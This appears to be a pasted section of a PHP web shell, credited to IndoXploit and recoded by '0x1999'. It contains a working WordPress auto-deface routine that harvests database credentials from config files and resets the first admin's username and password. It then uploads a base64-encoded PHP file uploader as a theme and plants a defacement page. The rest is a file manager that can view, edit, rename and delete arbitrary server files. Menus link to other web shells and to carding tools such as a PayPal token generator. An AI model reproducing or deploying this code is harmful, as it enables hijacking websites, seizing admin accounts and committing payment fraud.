  3812.         echo "<center><h1>WordPress Auto Deface</h1>
  3813.         <form method='post'>
  3814.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  3815.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By 0x1999' required><br>
  3816.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3817.         </form>
  3818.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  3819.         </center>";
  3820.     }
  3821. } elseif($_GET['do'] == 'auto_dwp2') {
  3822.     if($_POST['auto_deface_wp']) {
  3823.         function anucurl($sites) {
  3824.             $ch = curl_init($sites);
  3825.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3826.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3827.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3828.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3829.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3830.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3831.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3832.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3833.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  3834.             $data = curl_exec($ch);
  3835.                   curl_close($ch);
  3836.             return $data;
  3837.         }
  3838.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3839.             $post = array(
  3840.                    "log" => "$userr",
  3841.                    "pwd" => "$pass",
  3842.                    "rememberme" => "forever",
  3843.                    "wp-submit" => "$wp_submit",
  3844.                    "redirect_to" => "$web",
  3845.                    "testcookie" => "1",
  3846.                    );
  3847.             $ch = curl_init($cek);
  3848.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3849.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3850.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3851.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3852.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3853.                   curl_setopt($ch, CURLOPT_POST, 1);
  3854.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3855.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3856.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3857.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3858.             $data = curl_exec($ch);
  3859.                   curl_close($ch);
  3860.             return $data;
  3861.         }
  3862.         $link = explode("\r\n", $_POST['link']);
  3863.         $script = htmlspecialchars($_POST['script']);
  3864.         $user = "indoxploit";
  3865.         $pass = "indoxploit";
  3866.         $passx = md5($pass);
  3867.         foreach($link as $dir_config) {
  3868.             $config = anucurl($dir_config);
  3869.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  3870.             $dbuser = ambilkata($config,"DB_USER', '","'");
  3871.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3872.             $dbname = ambilkata($config,"DB_NAME', '","'");
  3873.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3874.             $prefix = $dbprefix."users";
  3875.             $option = $dbprefix."options";
  3876.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3877.             $db = mysql_select_db($dbname);
  3878.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3879.             $result = mysql_fetch_array($q);
  3880.             $id = $result[ID];
  3881.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3882.             $result2 = mysql_fetch_array($q2);
  3883.             $target = $result2[option_value];
  3884.             if($target == '') {                
  3885.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3886.             } else {
  3887.                 echo "[+] $target <br>";
  3888.             }
  3889.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3890.             if(!$conn OR !$db OR !$update) {
  3891.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3892.                 mysql_close($conn);
  3893.             } else {
  3894.                 $site = "$target/wp-login.php";
  3895.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  3896.                 $b1 = anucurl($site2);
  3897.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3898.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3899.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3900.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3901.                 $www = "m.php";
  3902.                 $fp5 = fopen($www,"w");
  3903.                 fputs($fp5,$upload3);
  3904.                 $post2 = array(
  3905.                         "_wpnonce" => "$anu2",
  3906.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3907.                         "themezip" => "@$www",
  3908.                         "install-theme-submit" => "Install Now",
  3909.                         );
  3910.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3911.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3912.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3913.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3914.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3915.                       curl_setopt($ch, CURLOPT_POST, 1);
  3916.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3917.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3918.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3919.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3920.                 $data3 = curl_exec($ch);
  3921.                       curl_close($ch);
  3922.                 $y = date("Y");
  3923.                 $m = date("m");
  3924.                 $namafile = "id.php";
  3925.                 $fpi = fopen($namafile,"w");
  3926.                 fputs($fpi,$script);
  3927.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3928.                        curl_setopt($ch6, CURLOPT_POST, true);
  3929.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3930.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3931.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3932.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3933.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  3934.                 $postResult = curl_exec($ch6);
  3935.                        curl_close($ch6);
  3936.                 $as = "$target/k.php";
  3937.                 $bs = anucurl($as);
  3938.                 if(preg_match("#$script#is", $bs)) {
  3939.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3940.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3941.                     } else {
  3942.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
  3943.                     echo "[!!] coba aja manual: <br>";
  3944.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3945.                     echo "[+] username: <font color=lime>$user</font><br>";
  3946.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  3947.                     }
  3948.                 mysql_close($conn);
  3949.             }
  3950.         }
  3951.     } else {
  3952.         echo "<center><h1>WordPress Auto Deface V.2</h1>
  3953.         <form method='post'>
  3954.         Link Config: <br>
  3955.         <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  3956.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By 0x1999' required><br>
  3957.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3958.         </form></center>";
  3959.     }
  3960. } elseif($_GET['act'] == 'newfile') {
  3961.     if($_POST['new_save_file']) {
  3962.         $newfile = htmlspecialchars($_POST['newfile']);
  3963.         $fopen = fopen($newfile, "a+");
  3964.         if($fopen) {
  3965.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  3966.         } else {
  3967.             $act = "<font color=red>permission denied</font>";
  3968.         }
  3969.     }
  3970.     echo $act;
  3971.     echo "<form method='post'>
  3972.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  3973.     <input type='submit' name='new_save_file' value='Submit'>
  3974.     </form>";
  3975. } elseif($_GET['act'] == 'newfolder') {
  3976.     if($_POST['new_save_folder']) {
  3977.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  3978.         if(!mkdir($new_folder)) {
  3979.             $act = "<font color=red>permission denied</font>";
  3980.         } else {
  3981.             $act = "<script>window.location='?dir=".$dir."';</script>";
  3982.         }
  3983.     }
  3984.     echo $act;
  3985.     echo "<form method='post'>
  3986.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  3987.     <input type='submit' name='new_save_folder' value='Submit'>
  3988.     </form>";
  3989. } elseif($_GET['act'] == 'rename_dir') {
  3990.     if($_POST['dir_rename']) {
  3991.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  3992.         if($dir_rename) {
  3993.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  3994.         } else {
  3995.             $act = "<font color=red>permission denied</font>";
  3996.         }
  3997.     echo "".$act."<br>";
  3998.     }
  3999.     echo "<form method='post'>
  4000.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  4001.     <input type='submit' name='dir_rename' value='rename'>
  4002.     </form>";
  4003. } elseif($_GET['act'] == 'delete_dir') {
  4004.     function Delete($path)
  4005. {
  4006.     if (is_dir($path) === true)
  4007.     {
  4008.         $files = array_diff(scandir($path), array('.', '..'));
  4009.         foreach ($files as $file)
  4010.         {
  4011.             Delete(realpath($path) . '/' . $file);
  4012.         }
  4013.         return rmdir($path);
  4014.     }
  4015.     else if (is_file($path) === true)
  4016.     {
  4017.         return unlink($path);
  4018.     }
  4019.     return false;
  4020. }
  4021.     $delete_dir = Delete($dir);
  4022.     if($delete_dir) {
  4023.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4024.     } else {
  4025.         $act = "<font color=red>could not remove ".basename($dir)."</font>";
  4026.     }
  4027.     echo $act;
  4028. } elseif($_GET['act'] == 'view') {
  4029.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4030.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4031. } elseif($_GET['act'] == 'edit') {
  4032.     if($_POST['save']) {
  4033.         $save = file_put_contents($_GET['file'], $_POST['src']);
  4034.         if($save) {
  4035.             $act = "<font color=lime>Saved!</font>";
  4036.         } else {
  4037.             $act = "<font color=red>permission denied</font>";
  4038.         }
  4039.     echo "".$act."<br>";
  4040.     }
  4041.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4042.     echo "<form method='post'>
  4043.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4044.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  4045.     </form>";
  4046. } elseif($_GET['act'] == 'rename') {
  4047.     if($_POST['do_rename']) {
  4048.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4049.         if($rename) {
  4050.             $act = "<script>window.location='?dir=".$dir."';</script>";
  4051.         } else {
  4052.             $act = "<font color=red>permission denied</font>";
  4053.         }
  4054.     echo "".$act."<br>";
  4055.     }
  4056.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4057.     echo "<form method='post'>
  4058.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4059.     <input type='submit' name='do_rename' value='rename'>
  4060.     </form>";
  4061. } elseif($_GET['act'] == 'delete') {
  4062.     $delete = unlink($_GET['file']);
  4063.     if($delete) {
  4064.         $act = "<script>window.location='?dir=".$dir."';</script>";
  4065.     } else {
  4066.         $act = "<font color=red>permission denied</font>";
  4067.     }
  4068.     echo $act;
  4069. }else {
  4070.     if(is_dir($dir) == true) {
  4071.         echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4072.         <tr>
  4073.         <th class="th_home"><center>Name</center></th>
  4074.         <th class="th_home"><center>Type</center></th>
  4075.         <th class="th_home"><center>Size</center></th>
  4076.         <th class="th_home"><center>Last Modified</center></th>
  4077.         <th class="th_home"><center>Permission</center></th>
  4078.         <th class="th_home"><center>Action</center></th>
  4079.         </tr>';
  4080.         $scandir = scandir($dir);
  4081.         foreach($scandir as $dirx) {
  4082.             $dtype = filetype("$dir/$dirx");
  4083.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4084.             if(!is_dir("$dir/$dirx")) continue;
  4085.             if($dirx === '..') {
  4086.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4087.             } elseif($dirx === '.') {
  4088.                 $href = "<a href='?dir=$dir'>$dirx</a>";
  4089.             } else {
  4090.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4091.             }
  4092.             if($dirx === '.' || $dirx === '..') {
  4093.                 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  4094.                 } else {
  4095.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  4096.             }
  4097.             echo "<tr>";
  4098.             echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4099.             echo "<td class='td_home'><center>$dtype</center></td>";
  4100.             echo "<td class='td_home'><center>-</center></th>";
  4101.             echo "<td class='td_home'><center>$dtime</center></td>";
  4102.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4103.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4104.         }
  4105.         echo "</tr>";
  4106.         foreach($scandir as $file) {
  4107.             $ftype = filetype("$dir/$file");
  4108.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4109.             $size = filesize("$dir/$file")/1024;
  4110.             $size = round($size,3);
  4111.             if($size > 1024) {
  4112.                 $size = round($size/1024,2). 'MB';
  4113.             } else {
  4114.                 $size = $size. 'KB';
  4115.             }
  4116.             if(!is_file("$dir/$file")) continue;
  4117.             echo "<tr>";
  4118.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4119.             echo "<td class='td_home'><center>$ftype</center></td>";
  4120.             echo "<td class='td_home'><center>$size</center></td>";
  4121.             echo "<td class='td_home'><center>$ftime</center></td>";
  4122.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4123.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  4124.         }
  4125.         echo "</tr></table>";
  4126.     } else {
  4127.         echo "<font color=red>can't open directory</font>";
  4128.     }
  4129.     }
  4130. echo "<center><hr><form>
  4131. <select onchange='if (this.value) window.open(this.value);'>
  4132.   <option selected='selected' value=''> Tools Creator </option>
  4133.   <option value='$ling=wso'>WSO 2.8.1</option>
  4134.   <option value='$ling=injection'>1n73ction v3</option>
  4135.   <option value='$ling=wk'>WHMCS Killer</option>
  4136.   <option value='$ling=adminer'>Adminer</option>
  4137.   <option value='$ling=b374k'>b374k Shell</option>
  4138.   <option value='$ling=b374k323'>b374k 3.2</option>  
  4139.   <option value='$ling=bh'>BlackHat Shell</option>      
  4140.   <option value='$ling=dhanus'>Dhanush Shell</option>    
  4141.   <option value='$ling=r57'>R57 Shell</option>    
  4142. <option value='$ling=encodedecode'>Encode Decode</option>    
  4143. <option value='$ling=r57'>R57 Shell</option>    
  4144. </select>
  4145. <select onchange='if (this.value) window.open(this.value);'>
  4146.   <option selected='selected' value=''> Tools Carder </option>
  4147.   <option value='$ling=extractor'>DB Email Extractor</option>
  4148.   <option value='$ling=promailerv2'>Pro Mailer V2</option>    
  4149.   <option value='$ling=bukalapak'>BukaLapak Checker</option>        
  4150.   <option value='$ling=tokopedia'>TokoPedia Checker</option>  
  4151.   <option value='$ling=tokenpp'>Paypal Token Generator</option>  
  4152.   <option value='$ling=mailer'>Mailer</option>  
  4153.   <option value='$ling=gamestopceker'>GamesTop Checker</option>
  4154.   </select>
  4155. <noscript><input type='submit' value='Submit'></noscript>
  4156. </form>Copyright &copy; ".date("Y")." - <a href='http://forum.indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a> Shell Recoded By <a href='http://fb.com/0x1999-410646679131007' target='_BLANK'><font color=lime>0x1999</a></font></center>";
  4157. ?>
  4158. </html>
Add Comment
Please, Sign In to add comment